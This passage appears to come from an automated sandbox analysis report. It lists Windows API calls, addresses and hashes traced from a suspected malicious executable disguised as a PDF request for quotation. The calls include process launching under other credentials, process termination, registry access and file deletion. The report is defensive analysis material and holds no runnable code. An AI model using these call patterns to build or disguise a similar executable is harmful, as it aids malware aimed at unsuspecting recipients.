                                                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AA1515
                                                                                                                • CloseHandle.KERNEL32(00000004), ref: 00AA1520
                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AA154F
                                                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00AA1563
                                                                                                                Similarity
                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                • String ID:
                                                                                                                • API String ID: 1413079979-0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00A63379,00A62FE5), ref: 00A63390
                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A6339E
                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A633B7
                                                                                                                • SetLastError.KERNEL32(00000000,?,00A63379,00A62FE5), ref: 00A63409
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                • String ID:
                                                                                                                • API String ID: 3852720340-0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00A75686,00A83CD6,?,00000000,?,00A75B6A,?,?,?,?,?,00A6E6D1,?,00B08A48), ref: 00A72D78
                                                                                                                • _free.LIBCMT ref: 00A72DAB
                                                                                                                • _free.LIBCMT ref: 00A72DD3
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00A6E6D1,?,00B08A48,00000010,00A44F4A,?,?,00000000,00A83CD6), ref: 00A72DE0
                                                                                                                • SetLastError.KERNEL32(00000000,?,?,?,?,00A6E6D1,?,00B08A48,00000010,00A44F4A,?,?,00000000,00A83CD6), ref: 00A72DEC
                                                                                                                • _abort.LIBCMT ref: 00A72DF2
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A59693
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596A2
                                                                                                                  • Part of subcall function 00A59639: BeginPath.GDI32(?), ref: 00A596B9
                                                                                                                  • Part of subcall function 00A59639: SelectObject.GDI32(?,00000000), ref: 00A596E2
                                                                                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AD8A4E
                                                                                                                • LineTo.GDI32(?,00000003,00000000), ref: 00AD8A62
                                                                                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AD8A70
                                                                                                                • LineTo.GDI32(?,00000000,00000003), ref: 00AD8A80
                                                                                                                • EndPath.GDI32(?), ref: 00AD8A90
                                                                                                                • StrokePath.GDI32(?), ref: 00AD8AA0
                                                                                                                Similarity
                                                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                • String ID:
                                                                                                                • API String ID: 43455801-0
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 00AA5218
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00AA5229
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AA5230
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00AA5238
                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AA524F
                                                                                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00AA5261
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Release
                                                                                                                • String ID:
                                                                                                                • API String ID: 1035833867-0
                                                                                                                APIs
                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A41BF4
                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A41BFC
                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A41C07
                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A41C12
                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A41C1A
                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A41C22
                                                                                                                Similarity
                                                                                                                • API ID: Virtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 4278518827-0
                                                                                                                APIs
                                                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00AAEB30
                                                                                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00AAEB46
                                                                                                                • GetWindowThreadProcessId.USER32(?,?), ref: 00AAEB55
                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB64
                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB6E
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00AAEB75
                                                                                                                Similarity
                                                                                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 839392675-0
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?), ref: 00A97452
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A97469
                                                                                                                • GetWindowDC.USER32(?), ref: 00A97475
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00A97484
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00A97496
                                                                                                                • GetSysColor.USER32(00000005), ref: 00A974B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 272304278-0
                                                                                                                APIs
                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AA187F
                                                                                                                • UnloadUserProfile.USERENV(?,?), ref: 00AA188B
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA1894
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00AA189C
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA18A5
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA18AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 146765662-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AAC6EE
                                                                                                                • _wcslen.LIBCMT ref: 00AAC735
                                                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00AAC79C
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00AAC7CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1227352736-4108050209
                                                                                                                APIs
                                                                                                                • ShellExecuteExW.SHELL32(0000003C), ref: 00ACAEA3
                                                                                                                  • Part of subcall function 00A47620: _wcslen.LIBCMT ref: 00A47625
                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 00ACAF38
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACAF67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                                                • String ID: <$@
                                                                                                                • API String ID: 146682121-1426351568
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AA7206
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AA723C
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AA724D
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AA72CF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: DllGetClassObject
                                                                                                                • API String ID: 753597075-1075368562
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AD3E35
                                                                                                                • IsMenu.USER32(?), ref: 00AD3E4A
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00AD3E92
                                                                                                                • DrawMenuBar.USER32 ref: 00AD3EA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3076010158-4108050209
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00AA3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00AA3CCA
                                                                                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AA1E66
                                                                                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AA1E79
                                                                                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 00AA1EA9
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$_wcslen$ClassName
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 2081771294-1403004172
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AD2F8D
                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00AD2F94
                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AD2FA9
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD2FB1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                • String ID: SysAnimate32
                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                APIs
                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A64D1E,00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002), ref: 00A64D8D
                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A64DA0
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00A64D1E,00A728E9,?,00A64CBE,00A728E9,00B088B8,0000000C,00A64E15,00A728E9,00000002,00000000), ref: 00A64DC3
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E9C
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A44EAE
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A44EDD,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44EC0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 145871493-3689287502
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E62
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A44E74
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A83CDE,?,00B11418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00A44E87
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2C05
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00AB2C87
                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AB2C9D
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2CAE
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AB2CC0
                                                                                                                Similarity
                                                                                                                • API ID: File$Delete$Copy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3226157194-0
                                                                                                                APIs
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 00ACA427
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ACA435
                                                                                                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ACA468
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACA63D
                                                                                                                Similarity
                                                                                                                • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3488606520-0
                                                                                                                APIs
                                                                                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00AE3700), ref: 00A7BB91
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B1121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00A7BC09
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00B11270,000000FF,?,0000003F,00000000,?), ref: 00A7BC36
                                                                                                                • _free.LIBCMT ref: 00A7BB7F
                                                                                                                  • Part of subcall function 00A729C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000), ref: 00A729DE
                                                                                                                  • Part of subcall function 00A729C8: GetLastError.KERNEL32(00000000,?,00A7D7D1,00000000,00000000,00000000,00000000,?,00A7D7F8,00000000,00000007,00000000,?,00A7DBF5,00000000,00000000), ref: 00A729F0
                                                                                                                • _free.LIBCMT ref: 00A7BD4B
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                • String ID:
                                                                                                                • API String ID: 1286116820-0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00AACF22,?), ref: 00AADDFD
                                                                                                                  • Part of subcall function 00AADDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00AACF22,?), ref: 00AADE16
                                                                                                                  • Part of subcall function 00AAE199: GetFileAttributesW.KERNEL32(?,00AACF95), ref: 00AAE19A
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00AAE473
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00AAE4AC
                                                                                                                • _wcslen.LIBCMT ref: 00AAE5EB
                                                                                                                • _wcslen.LIBCMT ref: 00AAE603
                                                                                                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00AAE650
                                                                                                                Similarity
                                                                                                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A49CB3: _wcslen.LIBCMT ref: 00A49CBD
                                                                                                                  • Part of subcall function 00ACC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00ACB6AE,?,?), ref: 00ACC9B5
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACC9F1
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA68
                                                                                                                  • Part of subcall function 00ACC998: _wcslen.LIBCMT ref: 00ACCA9E
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACBAA5
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00ACBB00
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00ACBB63
                                                                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00ACBBA6
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACBBB3
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(?), ref: 00AA8BCD
                                                                                                                • VariantClear.OLEAUT32 ref: 00AA8C3E
                                                                                                                • VariantClear.OLEAUT32 ref: 00AA8C9D
                                                                                                                • VariantClear.OLEAUT32(?), ref: 00AA8D10
                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AA8D3B
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$ChangeInitType
                                                                                                                APIs
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AB8BAE
                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AB8BDA
                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AB8C32
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AB8C57
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AB8C5F
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AC8F40
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AC8FD0
                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AC8FEC
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AC9032
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AC9052
                                                                                                                  • Part of subcall function 00A5F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AB1043,?,7644E610), ref: 00A5F6E6
                                                                                                                  • Part of subcall function 00A5F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A9FA64,00000000,00000000,?,?,00AB1043,?,7644E610,?,00A9FA64), ref: 00A5F70D
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                APIs
                                                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AD6C33
                                                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00AD6C4A
                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AD6C73
                                                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00ABAB79,00000000,00000000), ref: 00AD6C98
                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AD6CC7
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: _free
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00A59141
                                                                                                                • ScreenToClient.USER32(00000000,?), ref: 00A5915E
                                                                                                                • GetAsyncKeyState.USER32(00000001), ref: 00A59183
                                                                                                                • GetAsyncKeyState.USER32(00000002), ref: 00A5919D
                                                                                                                Similarity
                                                                                                                • API ID: AsyncState$ClientCursorScreen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210589936-0
                                                                                                                • Opcode ID: 2697d4bf66c1257119a1077030615d21f08bbdfed1ba71ee3550b5ae26ad7baf
                                                                                                                • Instruction ID: f93dc06aaec1cba7d45a2521105587dc6701ecc931e79e707b27129d3ad781ef
                                                                                                                • Opcode Fuzzy Hash: 2697d4bf66c1257119a1077030615d21f08bbdfed1ba71ee3550b5ae26ad7baf
                                                                                                                • Instruction Fuzzy Hash: 21413F71A0861BFBDF159F64C844BEEB7B5FB05325F208316E829A72A0C7346D54CBA1
                                                                                                                APIs
                                                                                                                • GetInputState.USER32 ref: 00AB38CB
                                                                                                                • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AB3922
                                                                                                                • TranslateMessage.USER32(?), ref: 00AB394B
                                                                                                                • DispatchMessageW.USER32(?), ref: 00AB3955
                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB3966
                                                                                                                Similarity
                                                                                                                • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                • String ID:
                                                                                                                • API String ID: 2256411358-0
                                                                                                                • Opcode ID: 83ff8b5139878bfb7968ace067802e6d3dae27fefa3f80c7e37fd3fb9c8974c9
                                                                                                                • Instruction ID: 57ced998c47cad78c9f748d3396a035e279e9d7b00a6cfb2337eccecd37aeef1
                                                                                                                • Opcode Fuzzy Hash: 83ff8b5139878bfb7968ace067802e6d3dae27fefa3f80c7e37fd3fb9c8974c9
                                                                                                                • Instruction Fuzzy Hash: 8A31D972504342EEEF35CB789858BF63BACAB05300F44456DD562C31A2EBF49685CB11
                                                                                                                APIs
